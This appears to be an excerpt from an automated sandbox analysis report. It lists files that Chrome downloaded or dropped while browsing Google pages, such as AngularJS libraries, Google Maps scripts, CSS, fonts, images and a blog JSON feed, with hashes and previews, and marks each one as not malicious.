                                                                                                                                                                                                                                                                                          Preview:.glue-cookie-notification-bar__accept,.glue-cookie-notification-bar__reject{font-size:1rem;line-height:1.5;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;-webkit-align-self:flex-start;-ms-flex-item-align:start;align-self:flex-start;border:1px solid transparent;border-radius:48px;display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-flow:row nowrap;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-flow:row nowrap;flex-flow:row nowrap;font-family:Google Sans,Arial,Helvetica,sans-serif;font-weight:500;-webkit-justify-content:space-around;-ms-flex-pack:distribute;justify-content:space-around;le
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (522)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4076
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.340062903633837
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:+KCTi4CmLQW+r0aNuV44tErsL3KbGOXSCWKOKjinR:+VpCSQ/r0aNgF8bGOXXWKvmnR
                                                                                                                                                                                                                                                                                          MD5:8E4770857D0E58A937D1DB748259D643
                                                                                                                                                                                                                                                                                          SHA1:B8D02156AA686F577AC14D45D71CE955BDB0E290
                                                                                                                                                                                                                                                                                          SHA-256:360B129FF44217AB7FB3246B6B1E4625DAFF41C2958599FB031A365AB4EF6DE2
                                                                                                                                                                                                                                                                                          SHA-512:3EF4944FF843FB6C5DCBCA2B6030082CD8F18E4658497AA0FBACF7DC08F8D415E6B773071A190FC89B8CEAA80B59F7346D345BDD71C347AD96393A7AA6BFBCB9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(x,p){'use strict';function s(f,k){var e=!1,a=!1;this.ngClickOverrideEnabled=function(b){return p.isDefined(b)?(b&&!a&&(a=!0,t.$$moduleName="ngTouch",k.directive("ngClick",t),f.decorator("ngClickDirective",["$delegate",function(a){if(e)a.shift();else for(var b=a.length-1;0<=b;){if("ngTouch"===a[b].$$moduleName){a.splice(b,1);break}b--}return a}])),e=b,this):e};this.$get=function(){return{ngClickOverrideEnabled:function(){return e}}}}function v(f,k,e){n.directive(f,["$parse","$swipe",function(a,.b){return function(l,u,g){function h(c){if(!d)return!1;var a=Math.abs(c.y-d.y);c=(c.x-d.x)*k;return r&&75>a&&0<c&&30<c&&.3>a/c}var m=a(g[f]),d,r,c=["touch"];p.isDefined(g.ngSwipeDisableMouse)||c.push("mouse");b.bind(u,{start:function(c,a){d=c;r=!0},cancel:function(c){r=!1},end:function(c,d){h(c)&&l.$apply(function(){u.triggerHandler(e);m(l,{$event:d})})}},c)}}])}var n=p.module("ngTouch",[]);n.info({a
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x426, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):103663
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.956164056644727
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:BoJHfLe6L2c5KBdF0DCq/k2F/xe6OKnvU8OL1qO3Q:B6HzB5WoCq/k4xdOkMH1q9
                                                                                                                                                                                                                                                                                          MD5:D84C40E0873FBB1EB0DE7E7ABCA7B765
                                                                                                                                                                                                                                                                                          SHA1:F4B4C0302A5EEED6E14B486CBFCD4DB5876EA9AD
                                                                                                                                                                                                                                                                                          SHA-256:8F8E02452CCAF91CC195BC7E4AD08FA0081340B14FDCBD1FDCD2C1B4DEED8F57
                                                                                                                                                                                                                                                                                          SHA-512:9DB48308F10D93B45A3EA8E48B6F311F9BE91E13C139A28681B829C3B0FEB033869BBA07C0D91287DD9EF16F8D818C6C1CE25F5E86AB14DDEFC8C5189EBC3B5F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................L......................!...."1A.Q.2aq#B....R.3....br.$C.......S..cs%DT....4................................4.......................!1.A."Qaq...2......#B...4C3............?../.....*)Z.%.....-3..s.FF...6........#."NO..Z.q.e.1R.....K..T...8..x`cI...........c.m..............:c....#=.=..F.e.Jm..;..N....2~..S.|.;.j.;`T...#...R;....#.>.].VF.7s.&..n.k...L..........xh..T,..Z3j..T..pNz.f...<`.PX..d.Oi..+.=.Z7<jmF...2<.....&ROr..n_........A....(f....g.6...t.......U.\..R.+i&|..H.'.........\..#.G.jc......:..?q/On. .l....H>.....R)-.L........Hz.Z.. w...O..W.I....A.g%c..x...'U..NX.(.........J.+....v.w.9..II.1**....w..m....F..F......Z.-.ja.......^...i:5.....&.i..{....N...5*...B...... 3T.R..3j.T.fpt.......J.F....-......`.`..I.m..U.j.S..1e#..U"u..q.j......nb.SaM.{I.Q.."up....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 20784, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):20784
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.989041194123322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:ldrXYIW4bkISLBTb0r2/y5Eod0/ihRUCuZwCGQf1Hvw/WCZmMyz6:l9YIWzIAfe6yTd0/k0ZZGQ1Y+c9yO
                                                                                                                                                                                                                                                                                          MD5:E11C810C086DF83C0876DD59ED32EBCB
                                                                                                                                                                                                                                                                                          SHA1:B89FE2ED6D016F81AF13B35797AD2B0E2E5C6822
                                                                                                                                                                                                                                                                                          SHA-256:ACC5497E76F832D950D14FCFA047DC3C864F7A0AAE4C7A20521C0C655A53033B
                                                                                                                                                                                                                                                                                          SHA-512:DB93E7E4818B40C7B16C241441A5BBFCD335121A89A737611ACA4E5BD1F22A7D8FD9A1E79E0D0A7701A497CF6BBC238A7417D5DAC3480D20D4742B9B9717A15C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv79oQ.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......Q0.......l..P..............................b..@.`..~..L..u.....D..'.....6.$.... .....X..#.....6..w;.v....n....yeUtv0v;.+...e..g$'24P.i.6n.!f;C.s&q...S...d..".............T;:....$...9I.....F.....?...px...q.:..qN.+G.X.i.....7N... p.cN...t...wb..."...E>....'Q..._=g... ..1......;..A........i.Z*...X.".....1T'..1.N.....s...-[.-.c.c;.I..@w.>...==...L...C.8.....m..)n,.........8....%.Z..~.W..o....^.*_-_.D...{.~.i.......U.J."..P..%E.nB=.f...5...J...:.$dQ.T).l_..t1...1.o.aI....C.........a[...d......a.:w...-x.;.2.. ...CjA..u...&iS..[.%.G...../n...#.....:../.+.1..........O../.....9g..Cf.J.....&....pS.h.......M%.......=.>&.E..Rj+..#.e]....G.*.bE,...`.........s.V.].\9.....S....e$.....).".PU.......\..n.Kl[u..+..U.....M&...,......R.U.....;ck......Y..j.....i5.*f#.x............t..[ ..Q.0A.W.......xV....:M.\..r#M`2.R.l..p..p......O...P...k6...F4O..%...x...5}g...OY?.8.0..f..+....`Tb3S@a..Q.A...%. ......(..;..P;.Q...k.AJH.s...l.^...^.!.......cc,=.......o
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5017
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.935873858259602
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:l5QfK0ucO5JrrxhDYRxyCowdz+C1QCKSW0A1w1isxeWJepW:0bFO5JPxhnCZ+NSW0A1w1iRWJepW
                                                                                                                                                                                                                                                                                          MD5:DFAD0FB219D858E4C577037B2678A1E2
                                                                                                                                                                                                                                                                                          SHA1:D25073EE4CDEE93CD0E91E4F677719F09D06C9B8
                                                                                                                                                                                                                                                                                          SHA-256:B564F7295D3C4E11B7C2C3F9B64C6E55F5C59E21CA68819CDF685540F4EF6818
                                                                                                                                                                                                                                                                                          SHA-512:E5498B1E82E84A3705D3F113CB082BA79B9A35D9306B2A376AFFB3C40D90A4620E7A847371E959158459FFFAC027BE391D036C29B60BFA062088DB394B0431A3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....PIDATx..]k...u.N....."........PP1El...8....2F...C`J!.<$!$Cx)!8.DD ...UT.P....P..$V.I .P..\.+..}.L.=..}.....h.{vF_..;.{.....s..8.ch.......\..Y..w.2E..>...9.$38y7 ct30>.Fd...........`O.m..mE....H....%..I.6E)...Y...........w;.D[.\*u}...y.#K...U.|..|...s.[p..nE.h.8x..x.U..j...i.lV.....;.P.`...........re.b.......y.'+....5.........6"K..........5.-,.....8.P2...p.M...L......f.v...D.wsnV&h..=.|........UuN....-O...}|....-...._...v..).6...<.}.._..+..`.PpK.sn^....3xv8.....w.T...}.FK.|.}=7...`.%M..0..U...w~+.F6.-Mp.Z.1.....|&.sr.2.4..f..%x...f0x.......f..d...\...v...jY........^..x...^..?.ok...$x...P...P.z..g.H...s.=7<!..7.-I..*.....Ka%..........T~-n.(......n;oh..&&......~f...*......N>..;&....D.Yp.2.....|...H`..1P.8.r>.n.Z...._.+.l.s.......G..BQ3...f.}.....1h)....WEs,QD.=.....g...._..uG..|...O+....R.8 $..MK...+...oy$.>4.-!..>.....O{.8......"..#.TT6$(....Hl)"..N<}.....kG.......7......d.....LV...`T.>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1366
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.691383605236124
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:AXfRSOvVfz9i4aYnlzzM/gC5L17rEdMC44W+KrFPazxG:YF79tlzz7GdEMC4XvxOG
                                                                                                                                                                                                                                                                                          MD5:96749937F159FC2ED45E2E2733F439FE
                                                                                                                                                                                                                                                                                          SHA1:C6F5FA809B17F9FC2EF50ECEC28BB257209BE6BE
                                                                                                                                                                                                                                                                                          SHA-256:71BD8D7C6185CBF1E744B627B3BAAC348F610AE8DD7DDC73410FD23400D72E8D
                                                                                                                                                                                                                                                                                          SHA-512:C9D5681E1D40587B111F1D82491CF15BDE88A863400772A7A4EFE0F0FEF759DF5D0EA12AAC7A915AE421C83C2448EC01608727D9C6ADFA93298231D0385D5E16
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx....k\U.....if251/..E...b(..I].......QI....6.E.. .....J[+..1.-...i..:1.d...E..f........].=.2..C.N."""".g|_`p....^........Tf....x...G.'}?..-...\d........c...$...0iL...3...r......=.2...q.1...`l...m..L..6.|.....q5rO.7.....J.=.6K..D....,....$}.2].&v.8...........`.."..9......xm..^..v../...v.b`9*./...n.b`y../..C............/../..........Id.b.x.>x1p.b...8...^...X./.N.......u.b..q..Y8....... .9-}`H..Z2.t.....o.....]..)H....r..h..........K..V....c..1p..8p..8...........c......5......w..P.....ug1~.....Z.K.&.Su...o.:.6.L^..Ee...C6..+G.....s.:>z.{|...Z.S..Nu....l...\..(ep........"....P.:.......m....~.!...q...-..DV.......1...q.I.Y\)]/7.....Ov...z..n.?..E....[[........8ly..%...Y....B6.u.S9....K>>S.!...?......B..........u......Y..E...O.VI.e"`~..7^;..^.|1..c_...{.~.........M^}.[...a*....UD-.^vE._w{.."....E...G.Ql..).}.7Z7..|.T&j.]If..m..k_.'K#...D..{..'..P.....%8.......?...4....6.......L..1...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (554)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):184994
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.631569490379207
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:YxTjNm8H2AO+yNwbuQjTgkK6Drm545DtsdayPnR5t1P2/6FzgAEY7N3D0OTFOu/b:YxTPWAO+yNwSQngkKWy545ydaqnR5tlJ
                                                                                                                                                                                                                                                                                          MD5:09E687964AECC32424F69065C6E09E01
                                                                                                                                                                                                                                                                                          SHA1:B8D3F468CA1EB45F21FC919564FAD50089B072AE
                                                                                                                                                                                                                                                                                          SHA-256:A55663C398778C3399E0BCB628DE29B8C4040611F00E8F996A7FEBF0CA0B3F84
                                                                                                                                                                                                                                                                                          SHA-512:BA389AB20D835938602484CB87B6D57A0D73271FA54DE81E57781524B6847BA06B88E0DE492CAF72E5035D6D8A1105F58D3EF85392B13DE53CC5DE1B1B6ADDD8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Zya,aza,cza,dza,eza,fza,hza,OC,QC,RC,jza,lza,UC,nza,VC,pza,WC,rza,qza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,$C,Nza,bD,Oza,Pza,Qza,Rza,Sza,Tza,Uza,Vza,Wza,Xza,Yza,$za,bAa,dAa,fAa,hAa,jAa,lAa,nAa,pAa,rAa,sAa,tAa,uAa,vAa,wAa,xAa,yAa,cD,zAa,AAa,BAa,CAa,DAa,EAa,GAa,eD,fD,HAa,IAa,JAa,KAa,LAa,MAa,NAa,OAa,PAa,QAa,RAa,gD,SAa,hD,TAa,UAa,VAa,WAa,XAa,YAa,ZAa,iD,$Aa,jD,aBa,bBa,cBa,dBa,eBa,fBa,gBa,hBa,iBa,jBa,kBa,lBa,mBa,nBa,oBa,pBa,qBa,rBa,sBa,uBa,vBa,wBa,yBa,lD,zBa,ABa,.BBa,CBa,DBa,EBa,GBa,JBa,KBa,MBa,PBa,QBa,RBa,ED,FD,GD,TBa,ID,JD,KD,LD,ND,VBa,OD,WBa,XBa,YBa,PD,QD,RD,SD,TD,ZBa,$Ba,aCa,cCa,dCa,UD,eCa,bCa,hCa,iCa,$D,mCa,qCa,rCa,sCa,cE,tCa,vCa,wCa,xCa,yCa,fE,ACa,FCa,oE,ICa,HCa,qE,JCa,sE,LCa,MCa,NCa,PCa,QCa,RE,SCa,SE,TCa,UCa,VCa,WCa,UE,YCa,XCa,ZCa,aDa,cDa,eDa,iDa,gDa,jDa,hDa,VE,WE,mDa,nDa,XE,YE,ZE,aF,bF,cF,pDa,eF,fF,qDa,gF,rDa,hF,iF,sDa,jF,kF,tDa,lF,zD
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 407 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):433358
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9752646890716035
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:hzjJKSYbNxFA+HOwofDfkAOPKTNVTo3KW592b:hhKSYbvFA+u/zNTNVTAfH2b
                                                                                                                                                                                                                                                                                          MD5:80D1789A0B164DC8CFA6E8EBD8594BA1
                                                                                                                                                                                                                                                                                          SHA1:07B60660052784719D562C124E557CB0ED02FD03
                                                                                                                                                                                                                                                                                          SHA-256:1EBCC1CB966A499369CEB7E392FD1E2CBF5747629CB73EAE0B332CEF47FC0E61
                                                                                                                                                                                                                                                                                          SHA-512:C908AE3B78EC545215FC483F26135F3717643CC849A674612FD74460DE252C50F5CDE7339BBEF33A5C7E39092322E23A2219DDDBB7BBCEDF45F06D5D6981B2B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/kQDv-46ToDkqXJ2DIlr7hKXKalQvL0NJy4oGIhNlUkxX95btXayCKNoZuaY_KT-6U8-Iz35FlDZXRd1U3bNFo99a3k0-vwIIbtEIStTKYwD_UxNkjA
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............N.!k....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx..Y.oY~..Y....oM]U..c.;q..K!...H....x.AH(A.#.H. .0...B...C..)@....q<.S..U......{\..k..9H.D2Uv.]R......7|....]?...._.....:../..}..N...m....:....u.j$.Z..],....1IDR.U3q..i..x...f...c...[../..a......(....*SJ......J...;Jja.<.J......{.H3...>.FtVgI..}W%.A.#..z...."x'CM:.s..7M......R.z..F.......g.....w.b%.|..\..m....#t.]..j!_I!o...(%.....^.a.i...m'@..K.C%.3O..x-|.....]).8xw-.1....T&T8)...u..!..${.u~...,..w..V.J..|8...l&...?....._..{..c.y.5>Ro.......}.o.?x...y0-&........!tR..@.\.].T.....J..|..Q./D.|..(q.a......R.. .p7@.].....ri... .g...x.....+........X...".....Q.. ..a...y...s..D....!.D!.J..'...B......)...4m.F.@8.R.G......v..H.&.... . .@...6h...Zk.RR7.Y....x.1..y..6x.s %.s.D.=..w.".A.....a.|.......C.l'.Z.Q.!......)...v..)....j..B..u.m.,..)..!.!xI..A .7.;M.....JJ-:kO].RI../..e..h%7...3..O.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):17791
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.992294496906227
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:qSZCQu7M1rqMTdgnhPWA1lO11oyAkZt/tKxOnYhVh785C:qz7M1rqMTOPHvslZt/twOnAfCC
                                                                                                                                                                                                                                                                                          MD5:20CCBA6D3757FA6658A93E4B720BF007
                                                                                                                                                                                                                                                                                          SHA1:962064A858552C03D1E91C65F10AF944FE9041A8
                                                                                                                                                                                                                                                                                          SHA-256:080CD0A95B598A06DF0C20011D358F4C0A8D6BEC109BD922DC76891D230905C6
                                                                                                                                                                                                                                                                                          SHA-512:CA55DA7EA6D7659EF834B22B55C2B34D2542BFC0F9887FBC236AD89B2FE6C7FFF00AF8F1307C50502B177A2DF30FB2783E5079C977BCB558FDCC09E626F27189
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://blog.google/api/v2/latest/?tags=sustainability
                                                                                                                                                                                                                                                                                          Preview:{"meta":{"total_count":362},"next_page":"/api/v2/latest?paginate=12&tags=sustainability&fields=&is_main_hero=False&show_hero=True&cursor=2","results":[{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-09-19 13:00:00+00:00\" aria-label=\"September 19\">Sep 19</time> / Data Centers and Infrastructure","go_live_date_time":"2024-09-19|13:00","hero":"https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/Omaha_1.png","tags":"data-centers-and-infrastructure,sustainability","summary":"How we.re approaching sustainability in Nebraska to support our data center operations in the state.","category":"article","author":"Ben Townsend, Amanda Peterson Corio","tag_name":"Data Centers and Infrastructure","sitespace_render":"","sitespace":"","word_count":727,"published_readable_date":"Sep 19","tag_eyebrow":"https://blog.google/inside-google/infrastructure/","published_node":"<time class=\"uni-timesince\" datetime=\"2024-09-19 13:00:00+00:00\">Sep 19</time>","full_url":"https
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1266)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1562
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2714430420096585
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:7llJkpDl3UAKkiB/+q1GilPHhW73iq/rXZCLS4QhTE4RuRZk/9SpeeSW:7+KhkoXAilPHiH/MLjYplSpeeSW
                                                                                                                                                                                                                                                                                          MD5:7708C11280060DC908A71D6F1451B021
                                                                                                                                                                                                                                                                                          SHA1:0081302F444120F14831E3A5440A7DF4DC4D4420
                                                                                                                                                                                                                                                                                          SHA-256:52D77BFFAE27B842362E9F8E0D1AB735DE85E28C8FF9B9F3F0104F6811DB2C4A
                                                                                                                                                                                                                                                                                          SHA-512:FAEF22A96095225AF63DE581BE63DC67F88D8475D1EA1787FDFCA328C386D095204FD00F18142AD09A5A4898B6AA32F3BBCFFE3664DBF575023A900B9581AF62
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/NticlS_l.min.js
                                                                                                                                                                                                                                                                                          Preview:import{r as d,s as p,x as c}from"./ycaG4YXp.min.js";import{e as u}from"./0XPwTFcg.min.js";import{n as f}from"./IYoTYjYE.min.js";import{t as n}from"./ianzD0dL.min.js";import{i as b}from"./IFunn9hk.min.js";const g=":host{display:flex;height:auto;scroll-snap-align:var(--bds-carousel-scroll-snap-align);scroll-snap-type:x mandatory}.container{box-sizing:border-box;width:var(--bds-carousel-slide-width);min-width:var(--bds-carousel-slide-width)}";var v=Object.defineProperty,m=Object.getOwnPropertyDescriptor,a=(e,i,t,o)=>{for(var s=o>1?void 0:o?m(i,t):i,l=e.length-1,h;l>=0;l--)(h=e[l])&&(s=(o?h(i,t,s):h(s))||s);return o&&s&&v(i,t,s),s};let r=class extends p{constructor(){super(...arguments),this.role="listitem",this._width=0,this._height=0}get width(){return this.container?.offsetWidth}get height(){return this.container?.offsetHeight}attributeChangedCallback(e,i,t){if(super.attributeChangedCallback(e,i,t),e==="visible"){const o=t==="";this.updateVideoStates(o)}}updateVideoStates(e){this.queryS
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9027), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9027
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947824943141241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:GFmlLkHo/a1rOQEo/eKO1O/XozXo/5VoD9ScNOR7cibmxuWK6:GcNn/a1rB//eKO1OQM/0D97OdCxu4
                                                                                                                                                                                                                                                                                          MD5:8F51790BFFFCC31ED97977E0F694A3A6
                                                                                                                                                                                                                                                                                          SHA1:734B38A9909BB10C3F8C6ACDABAF90BE5B01223C
                                                                                                                                                                                                                                                                                          SHA-256:372DCB604072BE98F12E6B48ECF53AA4238767FB34CC47723EEB3FC5552A65D0
                                                                                                                                                                                                                                                                                          SHA-512:EFCCC6A6A96FE86D3F955CC8D10E51EAA8E8230ADA7E57B6DD1110FAFC39F511D71480A20FCE51A7633F947634BB637B023828672C11E268C20DE32D00D5E3F4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/cookienotificationbar.min.css
                                                                                                                                                                                                                                                                                          Preview:.glue-cookie-notification-bar__accept,.glue-cookie-notification-bar__reject{font-size:1rem;line-height:1.5;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;-webkit-align-self:flex-start;-ms-flex-item-align:start;align-self:flex-start;border:1px solid transparent;border-radius:48px;display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-flow:row nowrap;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-flow:row nowrap;flex-flow:row nowrap;font-family:Google Sans,Arial,Helvetica,sans-serif;font-weight:500;-webkit-justify-content:space-around;-ms-flex-pack:distribute;justify-content:space-around;le
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (533)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5613
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.300943980264754
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:+KJ/i0LFo5KRn6olUCxH/XoyUnrH3c0PZeDt+mQ0enRy6PhR2g+l:++i0LC8d6of9rjQ0eRy6PhI
                                                                                                                                                                                                                                                                                          MD5:2C5468E7D561B3E8BD3B0D8E997A60A6
                                                                                                                                                                                                                                                                                          SHA1:2509C190F03FAB3F162F7931D8367760FE3E6B87
                                                                                                                                                                                                                                                                                          SHA-256:DDA50EA7F5CCA0B6896C97C0E9785E52743D5A902EF34388930DC5ADA71DD906
                                                                                                                                                                                                                                                                                          SHA-512:8D92BCF1F5D32FD8ACBDB78799370886D99E31355DFA6F24FCEC808AF0240F450F2990356611F1D782764E639869A1FD98EB19434C9531D14F2109194CC06462
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/angularjs/1.6.10/angular-route.min.js
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(J,d){'use strict';function A(d){k&&d.get("$route")}function B(t,u,g){return{restrict:"ECA",terminal:!0,priority:400,transclude:"element",link:function(a,f,b,c,m){function v(){l&&(g.cancel(l),l=null);n&&(n.$destroy(),n=null);p&&(l=g.leave(p),l.done(function(a){!1!==a&&(l=null)}),p=null)}function E(){var b=t.current&&t.current.locals;if(d.isDefined(b&&b.$template)){var b=a.$new(),c=t.current;p=m(b,function(b){g.enter(b,null,p||f).done(function(b){!1===b||!d.isDefined(w)||w&&!a.$eval(w)||u()});.v()});n=c.scope=b;n.$emit("$viewContentLoaded");n.$eval(k)}else v()}var n,p,l,w=b.autoscroll,k=b.onload||"";a.$on("$routeChangeSuccess",E);E()}}}function C(d,k,g){return{restrict:"ECA",priority:-400,link:function(a,f){var b=g.current,c=b.locals;f.html(c.$template);var m=d(f.contents());if(b.controller){c.$scope=a;var v=k(b.controller,c);b.controllerAs&&(a[b.controllerAs]=v);f.data("$ngControllerControl
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2, orientation=upper-left], baseline, precision 8, 1280x809, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):461703
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.97396817090042
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:uRpGaDcscJn+3Ja08BqyeqINqoRjPSlSTf:uRpGk1iN7BqyTCslGf
                                                                                                                                                                                                                                                                                          MD5:AF9B1DF42025E527BBAA89BDF2EC3F5D
                                                                                                                                                                                                                                                                                          SHA1:007246D983D06D47E7905BA1E3390E1CDD589B06
                                                                                                                                                                                                                                                                                          SHA-256:A27E60D520F8D871B39F628848751D5955FE315E2DE101356B7F92D8F7FE6C80
                                                                                                                                                                                                                                                                                          SHA-512:5E4714592F4BA4A2804354F4B33912468B157DB322D27B688D00227E2F4C96D51EA34CC30B6B13E7C88A54B0897A79E670B613F3027CBB76F9700A37CEFD7E08
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/09/f1/9acf2efa479fae88463b4b6fc333/chargingev.webp
